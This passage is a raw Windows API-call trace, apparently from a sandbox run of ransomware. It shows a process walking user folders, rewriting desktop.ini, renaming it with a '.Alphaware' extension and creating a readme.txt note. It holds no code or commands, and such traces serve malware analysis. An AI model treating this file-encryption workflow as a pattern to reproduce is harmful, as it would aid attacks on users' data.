ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee55be0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0088.414] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0088.414] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0088.414] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0088.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.417] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.418] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0088.418] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a2a610, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a2a610, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0088.418] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0088.418] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0088.418] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0088.418] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0088.418] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.421] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.421] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0088.421] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a2a610, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a2a610, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0088.421] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0088.421] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0088.421] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0088.421] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0088.421] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0088.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.425] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.425] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0088.425] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0088.425] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0088.425] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0088.425] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0088.427] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.427] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0088.427] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0088.427] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0088.427] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0088.427] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 0 [0088.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0088.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0088.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.428] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.429] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8317a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0088.429] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0088.429] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0088.429] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0088.429] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0088.429] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini", dwFileAttributes=0x80) returned 1 [0088.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0088.430] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\searches\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x25724e0 | out: lpFileInformation=0x25724e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8317a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x20c)) returned 1 [0088.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0088.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0088.430] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\searches\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0088.430] ReadFile (in: hFile=0x254, lpBuffer=0x2572920, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2572920*, lpNumberOfBytesRead=0x23eb38*=0x20c, lpOverlapped=0x0) returned 1 [0088.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0088.451] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\searches\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0088.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0088.456] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\searches\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86ea9420, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x388)) returned 1 [0088.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0088.456] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\searches\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\searches\\desktop.ini.alphaware")) returned 1 [0088.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0088.457] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\searches\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0088.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0088.458] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x86ecf580, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86ecf580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.459] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x86ea9420, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x388, 